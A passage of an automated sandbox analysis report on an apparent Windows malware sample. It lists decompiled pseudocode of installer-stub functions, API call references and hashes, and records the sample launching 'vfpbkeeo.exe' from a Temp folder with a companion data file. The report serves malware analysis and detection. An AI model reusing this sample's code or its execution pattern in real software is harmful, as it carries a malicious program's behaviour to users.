                                                                                              • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,00000400), ref: 004067C0
                                                                                              • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                              • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 4260037668-988979429
                                                                                              • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                              • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                              • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                              • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                              0x004056d0
                                                                                              0x004056da
                                                                                              0x004056df
                                                                                              0x004056e5
                                                                                              0x004056f0
                                                                                              0x004056f3
                                                                                              0x004056f6
                                                                                              0x004056fc
                                                                                              0x004056fc
                                                                                              0x00405702
                                                                                              0x0040570a
                                                                                              0x0040570d
                                                                                              0x0040572a
                                                                                              0x0040572e
                                                                                              0x00405737
                                                                                              0x00405737
                                                                                              0x00405741
                                                                                              0x0040574a
                                                                                              0x00405756
                                                                                              0x0040575d
                                                                                              0x00405761
                                                                                              0x00405764
                                                                                              0x00405777
                                                                                              0x00405785
                                                                                              0x00405785
                                                                                              0x00405789
                                                                                              0x0040578b
                                                                                              0x0040578e
                                                                                              0x00000000
                                                                                              0x0040578e
                                                                                              0x0040570f
                                                                                              0x00405717
                                                                                              0x0040571f
                                                                                              0x00405725
                                                                                              0x00000000
                                                                                              0x00405725
                                                                                              0x0040571f
                                                                                              0x0040570d
                                                                                              0x0040579a

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                              • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                              • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                              • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                              • String ID: ('B
                                                                                              • API String ID: 1495540970-2332581011
                                                                                              • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                              • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                              • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                              • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                              0x0040463d
                                                                                              0x004046f3
                                                                                              0x00000000
                                                                                              0x004046f3
                                                                                              0x0040464e
                                                                                              0x00404652
                                                                                              0x00000000
                                                                                              0x0040466c
                                                                                              0x0040466c
                                                                                              0x00404675
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404677
                                                                                              0x00404683
                                                                                              0x00404686
                                                                                              0x00404686
                                                                                              0x0040468c
                                                                                              0x00404692
                                                                                              0x00404692
                                                                                              0x0040469e
                                                                                              0x004046a4
                                                                                              0x004046ab
                                                                                              0x004046ae
                                                                                              0x004046b1
                                                                                              0x004046b3
                                                                                              0x004046b3
                                                                                              0x004046bb
                                                                                              0x004046c1
                                                                                              0x004046c1
                                                                                              0x004046cb
                                                                                              0x004046d0
                                                                                              0x004046d3
                                                                                              0x004046d8
                                                                                              0x004046db
                                                                                              0x004046db
                                                                                              0x004046eb
                                                                                              0x004046eb
                                                                                              0x00000000
                                                                                              0x004046ee

                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                              • GetSysColor.USER32(00000000), ref: 00404686
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                              • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                              • GetSysColor.USER32(?), ref: 004046B1
                                                                                              • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                              • DeleteObject.GDI32(?), ref: 004046DB
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                              • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                              • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                              • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                              0x004026ec
                                                                                              0x004026ee
                                                                                              0x004026f1
                                                                                              0x004026f3
                                                                                              0x004026f6
                                                                                              0x004026fb
                                                                                              0x004026ff
                                                                                              0x00402702
                                                                                              0x00402705
                                                                                              0x00402c2a
                                                                                              0x00402c2d
                                                                                              0x0040270b
                                                                                              0x0040270b
                                                                                              0x00402712
                                                                                              0x00402714
                                                                                              0x00402714
                                                                                              0x0040271a
                                                                                              0x0040287e
                                                                                              0x0040287e
                                                                                              0x00402881
                                                                                              0x00402886
                                                                                              0x004015b6
                                                                                              0x0040292e
                                                                                              0x0040292e
                                                                                              0x00000000
                                                                                              0x00402720
                                                                                              0x00402721
                                                                                              0x0040272c
                                                                                              0x0040272f
                                                                                              0x0040273b
                                                                                              0x0040273f
                                                                                              0x004027d7
                                                                                              0x004027ef
                                                                                              0x004027ff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402745
                                                                                              0x00402745
                                                                                              0x00402748
                                                                                              0x00402749
                                                                                              0x0040274c
                                                                                              0x00402751
                                                                                              0x00402758
                                                                                              0x00402760
                                                                                              0x00000000
                                                                                              0x00402766
                                                                                              0x00402766
                                                                                              0x0040276b
                                                                                              0x00000000
                                                                                              0x00402771
                                                                                              0x00402771
                                                                                              0x00402779
                                                                                              0x0040277c
                                                                                              0x0040277f
                                                                                              0x0040283a
                                                                                              0x00402841
                                                                                              0x00402785
                                                                                              0x0040278b
                                                                                              0x00402797
                                                                                              0x00402801
                                                                                              0x00402801
                                                                                              0x00402799
                                                                                              0x00402799
                                                                                              0x0040279c
                                                                                              0x0040279e
                                                                                              0x0040279e
                                                                                              0x0040279e
                                                                                              0x004027a1
                                                                                              0x004027a6
                                                                                              0x004027a9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004027ab
                                                                                              0x004027ae
                                                                                              0x004027bc
                                                                                              0x004027c2
                                                                                              0x004027d0
                                                                                              0x00000000
                                                                                              0x004027d2
                                                                                              0x00000000
                                                                                              0x004027d2
                                                                                              0x00000000
                                                                                              0x004027d0
                                                                                              0x0040279e
                                                                                              0x00402804
                                                                                              0x00402807
                                                                                              0x00000000
                                                                                              0x00402809
                                                                                              0x0040280e
                                                                                              0x0040284f
                                                                                              0x00402871
                                                                                              0x00402878
                                                                                              0x0040285d
                                                                                              0x0040285d
                                                                                              0x00402860
                                                                                              0x00402863
                                                                                              0x00402866
                                                                                              0x00402866
                                                                                              0x00000000
                                                                                              0x00402817
                                                                                              0x00402817
                                                                                              0x0040281a
                                                                                              0x0040281d
                                                                                              0x00402823
                                                                                              0x00402827
                                                                                              0x0040282a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040282a
                                                                                              0x0040280e
                                                                                              0x00402807
                                                                                              0x0040277f
                                                                                              0x0040276b
                                                                                              0x00402760
                                                                                              0x00000000
                                                                                              0x0040282c
                                                                                              0x0040282c
                                                                                              0x0040282f
                                                                                              0x00402838
                                                                                              0x00000000
                                                                                              0x0040272f
                                                                                              0x0040271a
                                                                                              0x00402c33
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                              • String ID: 9
                                                                                              • API String ID: 163830602-2366072709
                                                                                              • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                              • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                              • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                              • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                              0x004068f1
                                                                                              0x004068fa
                                                                                              0x00406911
                                                                                              0x00406911
                                                                                              0x00406918
                                                                                              0x00406924
                                                                                              0x00406924
                                                                                              0x00406927
                                                                                              0x0040692a
                                                                                              0x0040692f
                                                                                              0x00406931
                                                                                              0x0040693a
                                                                                              0x0040693e
                                                                                              0x0040695b
                                                                                              0x00406963
                                                                                              0x00406963
                                                                                              0x00406968
                                                                                              0x0040696a
                                                                                              0x0040696d
                                                                                              0x00406972
                                                                                              0x00406973
                                                                                              0x00406977
                                                                                              0x00406977
                                                                                              0x00406978
                                                                                              0x0040697f
                                                                                              0x00406981
                                                                                              0x00406988
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406990
                                                                                              0x00406996
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406996
                                                                                              0x0040699b

                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                              • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                              • CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                              • CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 589700163-4010320282
                                                                                              • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                              • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                              • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                              • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
